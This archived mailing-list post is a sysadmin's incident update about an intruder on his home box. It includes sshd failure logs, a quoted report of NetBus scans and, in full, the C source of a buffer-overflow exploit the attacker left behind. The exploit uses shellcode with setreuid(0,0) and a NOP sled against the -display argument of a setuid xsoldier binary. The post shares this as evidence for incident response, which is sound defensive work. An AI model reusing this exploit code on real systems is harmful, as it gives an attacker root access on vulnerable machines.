hacked @home **update**

[nmorgowicz () RALCOIND COM (Nick Morgowicz)]

 <<s.c>>
I'm not sure if this mailing list can do attachments, so i've attached the
file, and at the bottom of the e-mail message is the source as well.  At 8pm
last evening, about 6 hours after i booted this guy off my box, he tried to
ssh in with the compromised username, since i turned off telnet and turned
on my gShield firewall.  He was unsuccessful. :)

Jun  7 20:04:50 localhost sshd[28087]: Did not receive ident string from
147.91.1.113.
Jun  7 20:05:06 localhost PAM_pwdb[28088]: authentication failure; (uid=0)
-> public for sshd service
Jun  7 20:05:06 localhost sshd[28088]: Failed password for public from
147.91.1.113 port 13541
Jun  7 20:05:07 localhost sshd[28088]: Connection closed by 147.91.1.113

Jun  7 20:06:12 localhost PAM_pwdb[28091]: authentication failure; (uid=0)
-> public for sshd service
Jun  7 20:06:12 localhost sshd[28091]: Failed password for public from
133.34.45.222 port 1023
Jun  7 20:06:13 localhost sshd[28091]: Connection closed by 133.34.45.222
Jun  7 20:06:13 localhost PAM_pwdb[28091]: (sshd) session closed for user
public

A few people asked me if i was running a vulnerable version of bind, and if
he used the ADMROCKS exploit, and no, i'm not.  I'm using 8.2.2P5 with the
version info masked out so script kiddies won't get tempted.  I contacted my
friend who originally owned the account, and he regretfully admitted to
having a stupid, easy to guess password.

One person on the list said that he picked up the .on.wave.home.com address
on a sniffer trace a few evenings ago, probably the same time that this guy
got on my box.  His words:

<clip>
the  ...on.wave.home.com address... I have a sniffer trace of a
distributed scan coming from this network work 2 nights ago ...
basically they were scanning for NetBus backdoors (i.e. source port
incremental, dest port 12345)...

Acting quickly I threw up a rude DTK and presented a false indication
of Netbus... with in a short time period (15 min) I logged an attempt
to connect using Netbus... all attacks were unsuccessful...
</clip>

I'd like to thank everyone for such a quick response and for all your advice
and comments.  This is the first time that i've used this list and i'm very
impressed with the enthusiasm and help that everyone brought me. Thank you!
:)

Nick Morgowicz
Systems Administrator
Ralco Industries

-- source of s.c file --
#include <stdio.h>
#include <stdlib.h>

#define NOP 0x90                /*no operation skip to next instruction. */
#define LEN 4480                        /*our buffersize. */

char shellcode[] =              /*execve with setreuid(0,0) and no '/'
hellkit v1.1 */

"\xeb\x03\x5e\xeb\x05\xe8\xf8\xff\xff\xff\x83\xc6\x0d\x31\xc9\xb1\x6c\x80\x3
6\x01\x46\xe2\xfa"
  "\xea\x09\x2e\x63\x68\x6f\x2e\x72\x69\x01\x80\xed\x66\x2a\x01\x01"

"\x54\x88\xe4\x82\xed\x1d\x56\x57\x52\xe9\x01\x01\x01\x01\x5a\x80\xc2\xc7\x1
1"

"\x01\x01\x8c\xba\x1f\xee\xfe\xfe\xc6\x44\xfd\x01\x01\x01\x01\x88\x7c\xf9\xb
9"

"\x47\x01\x01\x01\x30\xf7\x30\xc8\x52\x88\xf2\xcc\x81\x8c\x4c\xf9\xb9\x0a\x0
1"

"\x01\x01\x88\xff\x30\xd3\x52\x88\xf2\xcc\x81\x30\xc1\x5a\x5f\x5e\x88\xed\x5
c"
  "\xc2\x91";

/*Nab the stack pointer to use as an index into our nop's*/
long
get_sp ()
{
  __asm__ ("mov %esp, %eax");
}

int
main (int argc, char *argv[])
{
  char buffer[LEN];
  int i, offset;
  long retaddr = get_sp ();

  if (argc <= 1)
    offset = 0;
  else
    offset = atoi (argv[1]);

/*#Copy the NOPs  in to the buffer leaving space for shellcode and
  #pointers*/

  for (i = 0; i < (LEN - strlen (shellcode) - 100); i++)
    *(buffer + i) = NOP;

/*[NNNNNNNNNNNNNNNNNNNNN                            ]*/
/*                      ^-- LEN -(strlen(shellcode)) - 35*/
/*#Copy the shell code into the buffer*/

  memcpy (buffer + i, shellcode, strlen (shellcode));

/*[NNNNNNNNNNNNNNNNNNNNNSSSSSSSSSSSSSSSS            ]*/
/*                      ^-(buffer+i)                 */
/*#Fill the buffer with our new address to jump to esp + offset */

  for (i = i + strlen (shellcode); i < LEN; i += 4)
    *(long *) &buffer[i] = retaddr+offset;

/*[NNNNNNNNNNNNNNNNNNNNNSSSSSSSSSSSSSSSSRRRRRRRRRRRRR]*/
/*                                      ^-(i+strlen(shellcode))*/

  printf ("Jumping to address %x BufSize %d\n", retaddr + offset, LEN);
  execl ("/usr/local/games/xsoldier", "xsoldier", "-display", buffer, 0);

}

<HR NOSHADE>
<UL>
<LI>application/octet-stream attachment: s.c
</UL>